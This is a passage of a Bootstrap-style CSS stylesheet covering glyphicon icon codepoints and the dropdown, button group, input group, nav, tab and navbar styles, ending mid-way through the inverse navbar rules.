content: "\e033";
}
.glyphicon-flag:before {
content: "\e034";
}
.glyphicon-headphones:before {
content: "\e035";
}
.glyphicon-volume-off:before {
content: "\e036";
}
.glyphicon-volume-down:before {
content: "\e037";
}
.glyphicon-volume-up:before {
content: "\e038";
}
.glyphicon-qrcode:before {
content: "\e039";
}
.glyphicon-barcode:before {
content: "\e040";
}
.glyphicon-tag:before {
content: "\e041";
}
.glyphicon-tags:before {
content: "\e042";
}
.glyphicon-book:before {
content: "\e043";
}
.glyphicon-bookmark:before {
content: "\e044";
}
.glyphicon-print:before {
content: "\e045";
}
.glyphicon-camera:before {
content: "\e046";
}
.glyphicon-font:before {
content: "\e047";
}
.glyphicon-bold:before {
content: "\e048";
}
.glyphicon-italic:before {
content: "\e049";
}
.glyphicon-text-height:before {
content: "\e050";
}
.glyphicon-text-width:before {
content: "\e051";
}
.glyphicon-align-left:before {
content: "\e052";
}
.glyphicon-align-center:before {
content: "\e053";
}
.glyphicon-align-right:before {
content: "\e054";
}
.glyphicon-align-justify:before {
content: "\e055";
}
.glyphicon-list:before {
content: "\e056";
}
.glyphicon-indent-left:before {
content: "\e057";
}
.glyphicon-indent-right:before {
content: "\e058";
}
.glyphicon-facetime-video:before {
content: "\e059";
}
.glyphicon-picture:before {
content: "\e060";
}
.glyphicon-map-marker:before {
content: "\e062";
}
.glyphicon-adjust:before {
content: "\e063";
}
.glyphicon-tint:before {
content: "\e064";
}
.glyphicon-edit:before {
content: "\e065";
}
.glyphicon-share:before {
content: "\e066";
}
.glyphicon-check:before {
content: "\e067";
}
.glyphicon-move:before {
content: "\e068";
}
.glyphicon-step-backward:before {
content: "\e069";
}
.glyphicon-fast-backward:before {
content: "\e070";
}
.glyphicon-backward:before {
content: "\e071";
}
.glyphicon-play:before {
content: "\e072";
}
.glyphicon-pause:before {
content: "\e073";
}
.glyphicon-stop:before {
content: "\e074";
}
.glyphicon-forward:before {
content: "\e075";
}
.glyphicon-fast-forward:before {
content: "\e076";
}
.glyphicon-step-forward:before {
content: "\e077";
}
.glyphicon-eject:before {
content: "\e078";
}
.glyphicon-chevron-left:before {
content: "\e079";
}
.glyphicon-chevron-right:before {
content: "\e080";
}
.glyphicon-plus-sign:before {
content: "\e081";
}
.glyphicon-minus-sign:before {
content: "\e082";
}
.glyphicon-remove-sign:before {
content: "\e083";
}
.glyphicon-ok-sign:before {
content: "\e084";
}
.glyphicon-question-sign:before {
content: "\e085";
}
.glyphicon-info-sign:before {
content: "\e086";
}
.glyphicon-screenshot:before {
content: "\e087";
}
.glyphicon-remove-circle:before {
content: "\e088";
}
.glyphicon-ok-circle:before {
content: "\e089";
}
.glyphicon-ban-circle:before {
content: "\e090";
}
.glyphicon-arrow-left:before {
content: "\e091";
}
.glyphicon-arrow-right:before {
content: "\e092";
}
.glyphicon-arrow-up:before {
content: "\e093";
}
.glyphicon-arrow-down:before {
content: "\e094";
}
.glyphicon-share-alt:before {
content: "\e095";
}
.glyphicon-resize-full:before {
content: "\e096";
}
.glyphicon-resize-small:before {
content: "\e097";
}
.glyphicon-exclamation-sign:before {
content: "\e101";
}
.glyphicon-gift:before {
content: "\e102";
}
.glyphicon-leaf:before {
content: "\e103";
}
.glyphicon-fire:before {
content: "\e104";
}
.glyphicon-eye-open:before {
content: "\e105";
}
.glyphicon-eye-close:before {
content: "\e106";
}
.glyphicon-warning-sign:before {
content: "\e107";
}
.glyphicon-plane:before {
content: "\e108";
}
.glyphicon-calendar:before {
content: "\e109";
}
.glyphicon-random:before {
content: "\e110";
}
.glyphicon-comment:before {
content: "\e111";
}
.glyphicon-magnet:before {
content: "\e112";
}
.glyphicon-chevron-up:before {
content: "\e113";
}
.glyphicon-chevron-down:before {
content: "\e114";
}
.glyphicon-retweet:before {
content: "\e115";
}
.glyphicon-shopping-cart:before {
content: "\e116";
}
.glyphicon-folder-close:before {
content: "\e117";
}
.glyphicon-folder-open:before {
content: "\e118";
}
.glyphicon-resize-vertical:before {
content: "\e119";
}
.glyphicon-resize-horizontal:before {
content: "\e120";
}
.glyphicon-hdd:before {
content: "\e121";
}
.glyphicon-bullhorn:before {
content: "\e122";
}
.glyphicon-bell:before {
content: "\e123";
}
.glyphicon-certificate:before {
content: "\e124";
}
.glyphicon-thumbs-up:before {
content: "\e125";
}
.glyphicon-thumbs-down:before {
content: "\e126";
}
.glyphicon-hand-right:before {
content: "\e127";
}
.glyphicon-hand-left:before {
content: "\e128";
}
.glyphicon-hand-up:before {
content: "\e129";
}
.glyphicon-hand-down:before {
content: "\e130";
}
.glyphicon-circle-arrow-right:before {
content: "\e131";
}
.glyphicon-circle-arrow-left:before {
content: "\e132";
}
.glyphicon-circle-arrow-up:before {
content: "\e133";
}
.glyphicon-circle-arrow-down:before {
content: "\e134";
}
.glyphicon-globe:before {
content: "\e135";
}
.glyphicon-wrench:before {
content: "\e136";
}
.glyphicon-tasks:before {
content: "\e137";
}
.glyphicon-filter:before {
content: "\e138";
}
.glyphicon-briefcase:before {
content: "\e139";
}
.glyphicon-fullscreen:before {
content: "\e140";
}
.glyphicon-dashboard:before {
content: "\e141";
}
.glyphicon-paperclip:before {
content: "\e142";
}
.glyphicon-heart-empty:before {
content: "\e143";
}
.glyphicon-link:before {
content: "\e144";
}
.glyphicon-phone:before {
content: "\e145";
}
.glyphicon-pushpin:before {
content: "\e146";
}
.glyphicon-usd:before {
content: "\e148";
}
.glyphicon-gbp:before {
content: "\e149";
}
.glyphicon-sort:before {
content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
content: "\e152";
}
.glyphicon-sort-by-order:before {
content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
content: "\e154";
}
.glyphicon-sort-by-attributes:before {
content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
content: "\e156";
}
.glyphicon-unchecked:before {
content: "\e157";
}
.glyphicon-expand:before {
content: "\e158";
}
.glyphicon-collapse-down:before {
content: "\e159";
}
.glyphicon-collapse-up:before {
content: "\e160";
}
.glyphicon-log-in:before {
content: "\e161";
}
.glyphicon-flash:before {
content: "\e162";
}
.glyphicon-log-out:before {
content: "\e163";
}
.glyphicon-new-window:before {
content: "\e164";
}
.glyphicon-record:before {
content: "\e165";
}
.glyphicon-save:before {
content: "\e166";
}
.glyphicon-open:before {
content: "\e167";
}
.glyphicon-saved:before {
content: "\e168";
}
.glyphicon-import:before {
content: "\e169";
}
.glyphicon-export:before {
content: "\e170";
}
.glyphicon-send:before {
content: "\e171";
}
.glyphicon-floppy-disk:before {
content: "\e172";
}
.glyphicon-floppy-saved:before {
content: "\e173";
}
.glyphicon-floppy-remove:before {
content: "\e174";
}
.glyphicon-floppy-save:before {
content: "\e175";
}
.glyphicon-floppy-open:before {
content: "\e176";
}
.glyphicon-credit-card:before {
content: "\e177";
}
.glyphicon-transfer:before {
content: "\e178";
}
.glyphicon-cutlery:before {
content: "\e179";
}
.glyphicon-header:before {
content: "\e180";
}
.glyphicon-compressed:before {
content: "\e181";
}
.glyphicon-earphone:before {
content: "\e182";
}
.glyphicon-phone-alt:before {
content: "\e183";
}
.glyphicon-tower:before {
content: "\e184";
}
.glyphicon-stats:before {
content: "\e185";
}
.glyphicon-sd-video:before {
content: "\e186";
}
.glyphicon-hd-video:before {
content: "\e187";
}
.glyphicon-subtitles:before {
content: "\e188";
}
.glyphicon-sound-stereo:before {
content: "\e189";
}
.glyphicon-sound-dolby:before {
content: "\e190";
}
.glyphicon-sound-5-1:before {
content: "\e191";
}
.glyphicon-sound-6-1:before {
content: "\e192";
}
.glyphicon-sound-7-1:before {
content: "\e193";
}
.glyphicon-copyright-mark:before {
content: "\e194";
}
.glyphicon-registration-mark:before {
content: "\e195";
}
.glyphicon-cloud-download:before {
content: "\e197";
}
.glyphicon-cloud-upload:before {
content: "\e198";
}
.glyphicon-tree-conifer:before {
content: "\e199";
}
.glyphicon-tree-deciduous:before {
content: "\e200";
}
.caret {
display: inline-block;
width: 0;
height: 0;
margin-left: 2px;
vertical-align: middle;
border-top: 4px solid;
border-right: 4px solid transparent;
border-left: 4px solid transparent;
}
.dropdown {
position: relative;
}
.dropdown-toggle:focus {
outline: 0;
}
.dropdown-menu {
position: absolute;
top: 100%;
left: 0;
z-index: 1000;
display: none;
float: left;
min-width: 160px;
padding: 5px 0;
margin: 2px 0 0;
font-size: 14px;
list-style: none;
background-color: #fff;
background-clip: padding-box;
border: 1px solid #ccc;
border: 1px solid rgba(0, 0, 0, .15);
border-radius: 4px;
-webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, .175);
box-shadow: 0 6px 12px rgba(0, 0, 0, .175);
}
.dropdown-menu.pull-right {
right: 0;
left: auto;
}
.dropdown-menu .divider {
height: 1px;
margin: 9px 0;
overflow: hidden;
background-color: #e5e5e5;
}
.dropdown-menu > li > a {
display: block;
padding: 3px 20px;
clear: both;
font-weight: normal;
line-height: 1.428571429;
color: #333;
white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
color: #262626;
text-decoration: none;
background-color: #f5f5f5;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
color: #fff;
text-decoration: none;
background-color: #428bca;
outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
color: #999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
text-decoration: none;
cursor: not-allowed;
background-color: transparent;
background-image: none;
filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
display: block;
}
.open > a {
outline: 0;
}
.dropdown-menu-right {
right: 0;
left: auto;
}
.dropdown-menu-left {
right: auto;
left: 0;
}
.dropdown-header {
display: block;
padding: 3px 20px;
font-size: 12px;
line-height: 1.428571429;
color: #999;
}
.dropdown-backdrop {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 990;
}
.pull-right > .dropdown-menu {
right: 0;
left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
content: "";
border-top: 0;
border-bottom: 4px solid;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
top: auto;
bottom: 100%;
margin-bottom: 1px;
}
@media (min-width: 768px) {
.navbar-right .dropdown-menu {
right: 0;
left: auto;
}
.navbar-right .dropdown-menu-left {
right: auto;
left: 0;
}
}
.btn-group,
.btn-group-vertical {
position: relative;
display: inline-block;
vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
position: relative;
float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
z-index: 2;
}
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus {
outline: none;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
margin-left: -1px;
}
.btn-toolbar {
margin-left: -5px;
}
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
border-radius: 0;
}
.btn-group > .btn:first-child {
margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group > .btn-group {
float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
border-radius: 0;
}
.btn-group > .btn-group:first-child > .btn:last-child,
.btn-group > .btn-group:first-child > .dropdown-toggle {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.btn-group > .btn-group:last-child > .btn:first-child {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
outline: 0;
}
.btn-group-xs > .btn {
padding: 1px 5px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-group-sm > .btn {
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-group-lg > .btn {
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
.btn-group > .btn + .dropdown-toggle {
padding-right: 8px;
padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
padding-right: 12px;
padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
-webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
}
.btn-group.open .dropdown-toggle.btn-link {
-webkit-box-shadow: none;
box-shadow: none;
}
.btn .caret {
margin-left: 0;
}
.btn-lg .caret {
border-width: 5px 5px 0;
border-bottom-width: 0;
}
.dropup .btn-lg .caret {
border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
display: block;
float: none;
width: 100%;
max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
margin-top: -1px;
margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
border-top-right-radius: 4px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
border-top-left-radius: 0;
border-top-right-radius: 0;
border-bottom-left-radius: 4px;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.btn-group-justified {
display: table;
width: 100%;
table-layout: fixed;
border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
display: table-cell;
float: none;
width: 1%;
}
.btn-group-justified > .btn-group .btn {
width: 100%;
}
[data-toggle="buttons"] > .btn > input[type="radio"],
[data-toggle="buttons"] > .btn > input[type="checkbox"] {
display: none;
}
.input-group {
position: relative;
display: table;
border-collapse: separate;
}
.input-group[class*="col-"] {
float: none;
padding-right: 0;
padding-left: 0;
}
.input-group .form-control {
float: left;
width: 100%;
margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
height: 46px;
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
height: 46px;
line-height: 46px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
height: 30px;
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
height: 30px;
line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
border-radius: 0;
}
.input-group-addon,
.input-group-btn {
width: 1%;
white-space: nowrap;
vertical-align: middle;
}
.input-group-addon {
padding: 6px 12px;
font-size: 14px;
font-weight: normal;
line-height: 1;
color: #555;
text-align: center;
background-color: #eee;
border: 1px solid #ccc;
border-radius: 4px;
}
.input-group-addon.input-sm {
padding: 5px 10px;
font-size: 12px;
border-radius: 3px;
}
.input-group-addon.input-lg {
padding: 10px 16px;
font-size: 18px;
border-radius: 6px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.input-group-addon:first-child {
border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.input-group-addon:last-child {
border-left: 0;
}
.input-group-btn {
position: relative;
font-size: 0;
white-space: nowrap;
}
.input-group-btn > .btn {
position: relative;
}
.input-group-btn > .btn + .btn {
margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
margin-left: -1px;
}
.nav {
padding-left: 0;
margin-bottom: 0;
list-style: none;
}
.nav > li {
position: relative;
display: block;
}
.nav > li > a {
position: relative;
display: block;
padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
text-decoration: none;
background-color: #eee;
}
.nav > li.disabled > a {
color: #999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
color: #999;
text-decoration: none;
cursor: not-allowed;
background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
background-color: #eee;
border-color: #428bca;
}
.nav .nav-divider {
height: 1px;
margin: 9px 0;
overflow: hidden;
background-color: #e5e5e5;
}
.nav > li > a > img {
max-width: none;
}
.nav-tabs {
border-bottom: 1px solid #ddd;
}
.nav-tabs > li {
float: left;
margin-bottom: -1px;
}
.nav-tabs > li > a {
margin-right: 2px;
line-height: 1.428571429;
border: 1px solid transparent;
border-radius: 4px 4px 0 0;
}
.nav-tabs > li > a:hover {
border-color: #eee #eee #ddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
color: #555;
cursor: default;
background-color: #fff;
border: 1px solid #ddd;
border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
width: 100%;
border-bottom: 0;
}
.nav-tabs.nav-justified > li {
float: none;
}
.nav-tabs.nav-justified > li > a {
margin-bottom: 5px;
text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
top: auto;
left: auto;
}
@media (min-width: 768px) {
.nav-tabs.nav-justified > li {
display: table-cell;
width: 1%;
}
.nav-tabs.nav-justified > li > a {
margin-bottom: 0;
}
}
.nav-tabs.nav-justified > li > a {
margin-right: 0;
border-radius: 4px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
border: 1px solid #ddd;
}
@media (min-width: 768px) {
.nav-tabs.nav-justified > li > a {
border-bottom: 1px solid #ddd;
border-radius: 4px 4px 0 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
border-bottom-color: #fff;
}
}
.nav-pills > li {
float: left;
}
.nav-pills > li > a {
border-radius: 4px;
}
.nav-pills > li + li {
margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
color: #fff;
background-color: #428bca;
}
.nav-stacked > li {
float: none;
}
.nav-stacked > li + li {
margin-top: 2px;
margin-left: 0;
}
.nav-justified {
width: 100%;
}
.nav-justified > li {
float: none;
}
.nav-justified > li > a {
margin-bottom: 5px;
text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
top: auto;
left: auto;
}
@media (min-width: 768px) {
.nav-justified > li {
display: table-cell;
width: 1%;
}
.nav-justified > li > a {
margin-bottom: 0;
}
}
.nav-tabs-justified {
border-bottom: 0;
}
.nav-tabs-justified > li > a {
margin-right: 0;
border-radius: 4px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
border: 1px solid #ddd;
}
@media (min-width: 768px) {
.nav-tabs-justified > li > a {
border-bottom: 1px solid #ddd;
border-radius: 4px 4px 0 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
border-bottom-color: #fff;
}
}
.tab-content > .tab-pane {
display: none;
}
.tab-content > .active {
display: block;
}
.nav-tabs .dropdown-menu {
margin-top: -1px;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.navbar {
position: relative;
min-height: 50px;
margin-bottom: 20px;
border: 1px solid transparent;
}
@media (min-width: 768px) {
.navbar {
border-radius: 4px;
}
}
@media (min-width: 768px) {
.navbar-header {
float: left;
}
}
.navbar-collapse {
max-height: 340px;
padding-right: 15px;
padding-left: 15px;
overflow-x: visible;
-webkit-overflow-scrolling: touch;
border-top: 1px solid transparent;
box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1);
}
.navbar-collapse.in {
overflow-y: auto;
}
@media (min-width: 768px) {
.navbar-collapse {
width: auto;
border-top: 0;
box-shadow: none;
}
.navbar-collapse.collapse {
display: block !important;
height: auto !important;
padding-bottom: 0;
overflow: visible !important;
}
.navbar-collapse.in {
overflow-y: visible;
}
.navbar-fixed-top .navbar-collapse,
.navbar-static-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
padding-right: 0;
padding-left: 0;
}
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
margin-right: -15px;
margin-left: -15px;
}
@media (min-width: 768px) {
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
margin-right: 0;
margin-left: 0;
}
}
.navbar-static-top {
z-index: 1000;
border-width: 0 0 1px;
}
@media (min-width: 768px) {
.navbar-static-top {
border-radius: 0;
}
}
.navbar-fixed-top,
.navbar-fixed-bottom {
position: fixed;
right: 0;
left: 0;
z-index: 1030;
}
@media (min-width: 768px) {
.navbar-fixed-top,
.navbar-fixed-bottom {
border-radius: 0;
}
}
.navbar-fixed-top {
top: 0;
border-width: 0 0 1px;
}
.navbar-fixed-bottom {
bottom: 0;
margin-bottom: 0;
border-width: 1px 0 0;
}
.navbar-brand {
float: left;
height: 20px;
padding: 15px 15px;
font-size: 18px;
line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
text-decoration: none;
}
@media (min-width: 768px) {
.navbar > .container .navbar-brand,
.navbar > .container-fluid .navbar-brand {
margin-left: -15px;
}
}
.navbar-toggle {
position: relative;
float: right;
padding: 9px 10px;
margin-top: 8px;
margin-right: 15px;
margin-bottom: 8px;
background-color: transparent;
background-image: none;
border: 1px solid transparent;
border-radius: 4px;
}
.navbar-toggle:focus {
outline: none;
}
.navbar-toggle .icon-bar {
display: block;
width: 22px;
height: 2px;
border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
margin-top: 4px;
}
@media (min-width: 768px) {
.navbar-toggle {
display: none;
}
}
.navbar-nav {
margin: 7.5px -15px;
}
.navbar-nav > li > a {
padding-top: 10px;
padding-bottom: 10px;
line-height: 20px;
}
@media (max-width: 767px) {
.navbar-nav .open .dropdown-menu {
position: static;
float: none;
width: auto;
margin-top: 0;
background-color: transparent;
border: 0;
box-shadow: none;
}
.navbar-nav .open .dropdown-menu > li > a,
.navbar-nav .open .dropdown-menu .dropdown-header {
padding: 5px 15px 5px 25px;
}
.navbar-nav .open .dropdown-menu > li > a {
line-height: 20px;
}
.navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-nav .open .dropdown-menu > li > a:focus {
background-image: none;
}
}
@media (min-width: 768px) {
.navbar-nav {
float: left;
margin: 0;
}
.navbar-nav > li {
float: left;
}
.navbar-nav > li > a {
padding-top: 15px;
padding-bottom: 15px;
}
.navbar-nav.navbar-right:last-child {
margin-right: -15px;
}
}
@media (min-width: 768px) {
.navbar-left {
float: left !important;
}
.navbar-right {
float: right !important;
}
}
.navbar-form {
padding: 10px 15px;
margin-top: 8px;
margin-right: -15px;
margin-bottom: 8px;
margin-left: -15px;
border-top: 1px solid transparent;
border-bottom: 1px solid transparent;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1);
}
@media (min-width: 768px) {
.navbar-form .form-group {
display: inline-block;
margin-bottom: 0;
vertical-align: middle;
}
.navbar-form .form-control {
display: inline-block;
width: auto;
vertical-align: middle;
}
.navbar-form .control-label {
margin-bottom: 0;
vertical-align: middle;
}
.navbar-form .radio,
.navbar-form .checkbox {
display: inline-block;
padding-left: 0;
margin-top: 0;
margin-bottom: 0;
vertical-align: middle;
}
.navbar-form .radio input[type="radio"],
.navbar-form .checkbox input[type="checkbox"] {
float: none;
margin-left: 0;
}
.navbar-form .has-feedback .form-control-feedback {
top: 0;
}
}
@media (max-width: 767px) {
.navbar-form .form-group {
margin-bottom: 5px;
}
}
@media (min-width: 768px) {
.navbar-form {
width: auto;
padding-top: 0;
padding-bottom: 0;
margin-right: 0;
margin-left: 0;
border: 0;
-webkit-box-shadow: none;
box-shadow: none;
}
.navbar-form.navbar-right:last-child {
margin-right: -15px;
}
}
.navbar-nav > li > .dropdown-menu {
margin-top: 0;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.navbar-btn {
margin-top: 8px;
margin-bottom: 8px;
}
.navbar-btn.btn-sm {
margin-top: 10px;
margin-bottom: 10px;
}
.navbar-btn.btn-xs {
margin-top: 14px;
margin-bottom: 14px;
}
.navbar-text {
margin-top: 15px;
margin-bottom: 15px;
}
@media (min-width: 768px) {
.navbar-text {
float: left;
margin-right: 15px;
margin-left: 15px;
}
.navbar-text.navbar-right:last-child {
margin-right: 0;
}
}
.navbar-default {
background-color: #f8f8f8;
border-color: #e7e7e7;
}
.navbar-default .navbar-brand {
color: #777;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
color: #5e5e5e;
background-color: transparent;
}
.navbar-default .navbar-text {
color: #777;
}
.navbar-default .navbar-nav > li > a {
color: #777;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
color: #333;
background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
color: #555;
background-color: #e7e7e7;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
color: #ccc;
background-color: transparent;
}
.navbar-default .navbar-toggle {
border-color: #ddd;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
background-color: #ddd;
}
.navbar-default .navbar-toggle .icon-bar {
background-color: #888;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
border-color: #e7e7e7;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
color: #555;
background-color: #e7e7e7;
}
@media (max-width: 767px) {
.navbar-default .navbar-nav .open .dropdown-menu > li > a {
color: #777;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
color: #333;
background-color: transparent;
}
.navbar-default .navbar-nav .open .dropdown-menu > .active > a,
.navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
color: #555;
background-color: #e7e7e7;
}
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
color: #ccc;
background-color: transparent;
}
}
.navbar-default .navbar-link {
color: #777;
}
.navbar-default .navbar-link:hover {
color: #333;
}
.navbar-inverse {
background-color: #222;
border-color: #080808;
}
.navbar-inverse .navbar-brand {
color: #999;
}
.navbar-inverse .navbar-brand:hover,
